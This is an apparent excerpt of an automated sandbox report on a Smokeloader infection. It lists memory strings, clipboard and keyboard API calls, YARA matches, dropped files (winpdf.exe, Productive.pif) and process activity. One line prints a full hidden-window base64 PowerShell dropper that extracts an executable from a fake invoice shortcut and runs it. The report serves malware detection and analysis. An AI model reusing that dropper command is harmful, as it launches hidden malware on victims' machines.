        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/stocks-and-bitcoin-jump-after-trump-s-victory-so-do-worries-
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/trump-s-comeback-reverberates-through-markets/ar-AA1tzSZJ
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/other/a-youtuber-asked-a-group-of-americans-aged-70-to-80-what-their
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/andy-kim-ushers-in-a-new-era-as-he-becomes-1st-asian-america
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/chris-matthews-laments-democrats-open-border-policies-after-
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/devastated-harris-voters-conclude-america-hates-women-as-tru
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/republican-tim-sheehy-unseats-democratic-us-senator-jon-test
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/russia-blamed-for-bomb-threats-at-polling-sites-in-georgia-a
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/why-i-was-wrong-allan-lichtman-fails-to-predict-correct-outc
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/uknews/trump-s-loss-making-scotland-golf-course-celebrates-historic-v
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/tips/10-things-you-can-take-from-planes-and-6-things-you-can-t/ss-A
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/forecast/in-New-York?loc=eyJsIjoiTmV3IFlvcmsiLCJyIjoiTmV3IFlvcmsiL
        Source: explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/strange-things-banned-from-plane/
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Source: Yara matchFile source: 0000000F.00000002.20019876866.0000000002950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.20020080729.0000000002C31000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.24415374233.0000000000A21000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.24415691704.0000000003431000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 808, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4480, type: MEMORYSTR
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeCode function: 3_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,3_2_004050CD
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_00324830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,13_2_00324830
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_00324830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,15_2_00324830
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_00954830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,17_2_00954830
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_00324632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,13_2_00324632
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeCode function: 3_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,3_2_004044A5
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_0033D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,13_2_0033D164
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_0033D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,15_2_0033D164
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_0096D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,17_2_0096D164

        E-Banking Fraud

        barindex
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -e JABiADYANAAgAD0AIABAACgAUwBlAGwAZQBjAHQALQBTAHQAcgBpAG4AZwAgAC0AUABhAHQAdABlAHIAbgAgACIAYQBEAHUAYwBrACIAIAAtAFAAYQB0AGgAIAAuAFwAaQBuAHYAbwBpAGMAZQBfAHQAZQBtAHAAbABhAHQAZQAuAHAAZABmAC4AbABuAGsAKQAuAEwAaQBuAGUAIAAtAHIAZQBwAGwAYQBjAGUAIAAnAGEARAB1AGMAawAnADsAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABlAG4AdgA6AHQAZQBtAHAAXAB3AGkAbgBwAGQAZgAuAGUAeABlACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlACAALQBWAGEAbAB1AGUAIABAACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgA2ADQAKQApADsAIABpAG4AdgBvAGsAZQAtAGkAdABlAG0AIAAkAGUAbgB2ADoAdABlAG0AcABcAHcAaQBuAHAAZABmAC4AZQB4AGUA

        System Summary

        barindex
        Source: 0000000F.00000002.20019876866.0000000002950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
        Source: 0000000F.00000002.20020080729.0000000002C31000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
        Source: Process Memory Space: powershell.exe PID: 4428, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\winpdf.exeJump to dropped file
        Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 6%
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002D0E38 CloseHandle,NtResumeThread,13_2_002D0E38
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_00403095 RtlCreateUserThread,NtTerminateProcess,15_2_00403095
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_004015DD NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,15_2_004015DD
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_004015E8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,15_2_004015E8
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_004015F3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,15_2_004015F3
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_004015FA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,15_2_004015FA
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_0040160A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,15_2_0040160A
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_0040160E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,15_2_0040160E
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_00401613 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,15_2_00401613
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_00314254: CreateFileW,DeviceIoControl,CloseHandle,13_2_00314254
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_00308F2E DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,13_2_00308F2E
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeCode function: 3_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,3_2_00403883
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_00315778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,13_2_00315778
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_00315778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,15_2_00315778
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_00945778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,17_2_00945778
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeFile created: C:\Windows\CheckTransJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeFile created: C:\Windows\PractitionersCleaningJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeFile created: C:\Windows\AlexTampaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeFile created: C:\Windows\HoldingTruthJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeFile created: C:\Windows\GraduatedQuoteJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeCode function: 3_2_0040497C3_2_0040497C
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeCode function: 3_2_00406ED23_2_00406ED2
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeCode function: 3_2_004074BB3_2_004074BB
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002B94E013_2_002B94E0
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002B9C8013_2_002B9C80
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002D23F513_2_002D23F5
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_0033840013_2_00338400
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002E650213_2_002E6502
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002E265E13_2_002E265E
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002BE6F013_2_002BE6F0
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002D282A13_2_002D282A
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002E89BF13_2_002E89BF
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_00330A3A13_2_00330A3A
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002E6A7413_2_002E6A74
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002C0BE013_2_002C0BE0
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002DCD5113_2_002DCD51
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_0030EDB213_2_0030EDB2
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_00318E4413_2_00318E44
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_00330EB713_2_00330EB7
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002E6FE613_2_002E6FE6
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002D33B713_2_002D33B7
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002DF40913_2_002DF409
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002CD45D13_2_002CD45D
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002CF62813_2_002CF628
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002B166313_2_002B1663
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002BF6A013_2_002BF6A0
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002D16B413_2_002D16B4
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002D78C313_2_002D78C3
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002D1BA813_2_002D1BA8
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002DDBA513_2_002DDBA5
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002E9CE513_2_002E9CE5
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002CDD2813_2_002CDD28
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002D1FC013_2_002D1FC0
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002DBFD613_2_002DBFD6
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002D23F515_2_002D23F5
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_0033840015_2_00338400
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002E650215_2_002E6502
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002E265E15_2_002E265E
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002BE6F015_2_002BE6F0
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002D282A15_2_002D282A
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002E89BF15_2_002E89BF
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_00330A3A15_2_00330A3A
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002E6A7415_2_002E6A74
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002C0BE015_2_002C0BE0
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002DCD5115_2_002DCD51
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_0030EDB215_2_0030EDB2
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_00318E4415_2_00318E44
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_00330EB715_2_00330EB7
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002E6FE615_2_002E6FE6
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002D33B715_2_002D33B7
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002DF40915_2_002DF409
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002CD45D15_2_002CD45D
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002B94E015_2_002B94E0
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002CF62815_2_002CF628
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002B166315_2_002B1663
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002BF6A015_2_002BF6A0
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002D16B415_2_002D16B4
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002D78C315_2_002D78C3
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002D1BA815_2_002D1BA8
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002DDBA515_2_002DDBA5
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002B9C8015_2_002B9C80
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002E9CE515_2_002E9CE5
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002CDD2815_2_002CDD28
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002D1FC015_2_002D1FC0
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002DBFD615_2_002DBFD6
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_009023F517_2_009023F5
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_0096840017_2_00968400
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_0091650217_2_00916502
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_008EE6F017_2_008EE6F0
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_0091265E17_2_0091265E
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_0090282A17_2_0090282A
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_009189BF17_2_009189BF
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_00960A3A17_2_00960A3A
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_00916A7417_2_00916A74
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_008F0BE017_2_008F0BE0
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_0093EDB217_2_0093EDB2
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_0090CD5117_2_0090CD51
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_00960EB717_2_00960EB7
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_00948E4417_2_00948E44
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_00916FE617_2_00916FE6
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_009033B717_2_009033B7
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_008E94E017_2_008E94E0
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_0090F40917_2_0090F409
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_008FD45D17_2_008FD45D
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_009016B417_2_009016B4
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_008EF6A017_2_008EF6A0
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_008FF62817_2_008FF628
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_008E166317_2_008E1663
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_009078C317_2_009078C3
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_0090DBA517_2_0090DBA5
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_00901BA817_2_00901BA8
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_008E9C8017_2_008E9C80
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_00919CE517_2_00919CE5
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_0090BFD617_2_0090BFD6
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_00901FC017_2_00901FC0
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\367647\Productive.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeCode function: String function: 004062A3 appears 58 times
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: String function: 002E1B70 appears 60 times
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: String function: 002D0D17 appears 140 times
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: String function: 002D312D appears 42 times
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: String function: 002C1A36 appears 68 times
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: String function: 002B4DC0 appears 40 times
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: String function: 002D39FB appears 36 times
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: String function: 002B2111 appears 38 times
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: String function: 002D8B30 appears 84 times
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: String function: 002C1CB6 appears 50 times
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: String function: 002D9FA5 appears 46 times
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: String function: 00908B30 appears 42 times
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: String function: 008F1A36 appears 34 times
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: String function: 00900D17 appears 70 times
        Source: WalletService.dll.mui.25.drStatic PE information: No import functions for PE file found
        Source: 0000000F.00000002.20019876866.0000000002950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
        Source: 0000000F.00000002.20020080729.0000000002C31000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
        Source: Process Memory Space: powershell.exe PID: 4428, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: explorer.exe, 00000010.00000003.20177219236.000000000D31D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20178109061.000000000D326000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.20005267451.000000000D31D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBpEP#
